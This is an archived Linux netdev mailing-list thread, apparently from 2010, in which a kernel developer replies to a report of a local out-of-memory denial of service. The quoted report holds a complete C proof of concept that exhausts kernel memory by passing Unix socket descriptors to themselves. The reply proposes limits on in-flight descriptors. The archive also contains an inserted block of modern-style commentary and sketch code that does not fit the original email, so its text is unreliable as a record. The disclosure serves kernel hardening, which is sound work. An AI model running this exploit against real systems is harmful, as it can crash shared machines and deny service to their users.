public inbox for netdev@vger.kernel.org
From: Eric Dumazet <eric.dumazet@gmail.com>
To: Vegard Nossum <vegard.nossum@gmail.com>,
	David Miller <davem@davemloft.net>
Cc: LKML <linux-kernel@vger.kernel.org>,
	Andrew Morton <akpm@linux-foundation.org>,
	Eugene Teo <eugene@redhat.com>, netdev <netdev@vger.kernel.org>
Subject: Re: Unix socket local DOS (OOM)
Date: Wed, 24 Nov 2010 00:11:58 +0100	[thread overview]
Message-ID: <1290553918.2866.80.camel@edumazet-laptop> (raw)
In-Reply-To: <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>

On Tue, 23 Nov 2010 at 23:21 +0100, Vegard Nossum wrote:
> Hi,
> 
> I found this program lying around on my laptop. It kills my box
> (2.6.35) instantly by consuming a lot of memory (allocated by the
> kernel, so the process doesn't get killed by the OOM killer). As far
> as I can tell, the memory isn't being freed when the program exits
> either. Maybe it will eventually get cleaned up by the UNIX socket
> garbage collector, but in that case it doesn't get called quickly
> enough to save my machine, at least.
> 
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <sys/wait.h>
> 
> #include <errno.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> 
> static int send_fd(int unix_fd, int fd)
> {
>         struct msghdr msgh;
>         struct cmsghdr *cmsg;
>         char buf[CMSG_SPACE(sizeof(fd))];
> 
>         memset(&msgh, 0, sizeof(msgh));
> 
>         memset(buf, 0, sizeof(buf));
>         msgh.msg_control = buf;
>         msgh.msg_controllen = sizeof(buf);
> 
>         cmsg = CMSG_FIRSTHDR(&msgh);
>         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
>         cmsg->cmsg_level = SOL_SOCKET;
>         cmsg->cmsg_type = SCM_RIGHTS;
> 
>         msgh.msg_controllen = cmsg->cmsg_len;
> 
>         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
>         return sendmsg(unix_fd, &msgh, 0);
> }
> 
> int main(int argc, char *argv[])
> {
>         while (1) {
>                 pid_t child;
> 
>                 child = fork();
>                 if (child == -1)
>                         exit(EXIT_FAILURE);
> 
>                 if (child == 0) {
>                         int fd[2];
>                         int i;
> 
>                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
>                                 goto out_error;
> 
>                         for (i = 0; i < 100; ++i) {
>                                 if (send_fd(fd[0], fd[0]) == -1)
>                                         goto out_error;
> 
>                                 if (send_fd(fd[1], fd[1]) == -1)
>                                         goto out_error;
>                         }
> 
>                         close(fd[0]);
>                         close(fd[1]);
>                         goto out;
> 
>                 out_error:
>                         fprintf(stderr, "error: %s\n", strerror(errno));
>                 out:
>                         exit(EXIT_SUCCESS);
>                 }
> 
>                 while (1) {
>                         pid_t kid;
>                         int status;
> 
>                         kid = wait(&status);
>                         if (kid == -1) {
>                                 if (errno == ECHILD)
>                                         break;
>                                 if (errno == EINTR)
>                                         continue;
> 
>                                 exit(EXIT_FAILURE);
>                         }
> 
>                         if (WIFEXITED(status)) {
>                                 if (WEXITSTATUS(status))
>                                         exit(WEXITSTATUS(status));
>                                 break;
>                         }
>                 }
>         }
> 
>         return EXIT_SUCCESS;
> }
> 
> 
> Vegard
> --
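
For completeness, the receive-side counterpart to the send_fd() helper above could look like the hypothetical recv_fd() below (the name and the 1-byte scratch iovec are illustrative, not part of the PoC). The PoC deliberately never calls anything like this: the passed descriptors stay "in flight" forever, which is what pins the kernel memory.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Hypothetical counterpart to send_fd(): receive one descriptor
 * passed via SCM_RIGHTS. Returns the new fd, or -1 on error /
 * if no descriptor was attached. */
static int recv_fd(int unix_fd)
{
        struct msghdr msgh;
        struct cmsghdr *cmsg;
        char buf[CMSG_SPACE(sizeof(int))];
        char data;
        struct iovec iov = { .iov_base = &data, .iov_len = 1 };
        int fd = -1;

        memset(&msgh, 0, sizeof(msgh));
        msgh.msg_iov = &iov;
        msgh.msg_iovlen = 1;
        msgh.msg_control = buf;
        msgh.msg_controllen = sizeof(buf);

        if (recvmsg(unix_fd, &msgh, 0) == -1)
                return -1;

        /* Walk the control messages looking for the SCM_RIGHTS payload. */
        for (cmsg = CMSG_FIRSTHDR(&msgh); cmsg; cmsg = CMSG_NXTHDR(&msgh, cmsg)) {
                if (cmsg->cmsg_level == SOL_SOCKET &&
                    cmsg->cmsg_type == SCM_RIGHTS) {
                        memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));
                        break;
                }
        }
        return fd;
}
```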

Hi Vegard

Do you have a patch to correct this problem?

I suppose we should add a machine-wide limit on the number of pending
struct scm_fp_list entries (a percpu_counter, I guess).
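
The accounting could look something like the following userspace sketch in C11 atomics (the counter name mirrors the kernel's unix_tot_inflight, but the cap value, function names, and the use of a plain atomic instead of a percpu_counter are all illustrative assumptions):

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Illustrative sketch, not kernel code: a machine-wide counter of
 * in-flight SCM_RIGHTS file references with a hard cap, checked
 * before attaching fds to a message. */
#define INFLIGHT_MAX 16000L     /* arbitrary cap for the sketch */

static atomic_long unix_tot_inflight;   /* assumed name */

/* Try to account for 'count' new in-flight fds; refuse past the cap. */
static bool scm_charge_inflight(long count)
{
        long old = atomic_load(&unix_tot_inflight);

        while (old + count <= INFLIGHT_MAX) {
                if (atomic_compare_exchange_weak(&unix_tot_inflight,
                                                 &old, old + count))
                        return true;    /* charged */
                /* CAS failed: 'old' was reloaded, re-check the cap */
        }
        return false;   /* would exceed the cap: fail the sendmsg() */
}

/* Undo the charge when the fds are received or destroyed. */
static void scm_uncharge_inflight(long count)
{
        atomic_fetch_sub(&unix_tot_inflight, count);
}
```

A sender hitting the cap would get an error back from sendmsg() instead of silently growing kernel memory, which is exactly the failure mode the PoC exploits.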

David, commit f8d570a4 added one "struct list_head list;" to struct
scm_fp_list, doubling its allocation because of power-of-two kmalloc()
sizes (4096 bytes on 64bit arches instead of 2048 previously).

We might lower SCM_MAX_FD from 255 to 253?





Thread overview: 12+ messages
     [not found] <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>
2010-11-23 23:11 ` Eric Dumazet [this message]
2010-11-23 23:25   ` Unix socket local DOS (OOM) Vegard Nossum
2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 19:17     ` David Miller
2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44     ` Andi Kleen
2010-11-24 15:18       ` Eric Dumazet
2010-11-24 16:25         ` Andi Kleen
2010-11-24 17:14         ` David Miller
2010-11-26  8:50     ` Michal Hocko
2010-11-27  2:27       ` David Miller
2010-11-29 10:37         ` Michal Hocko
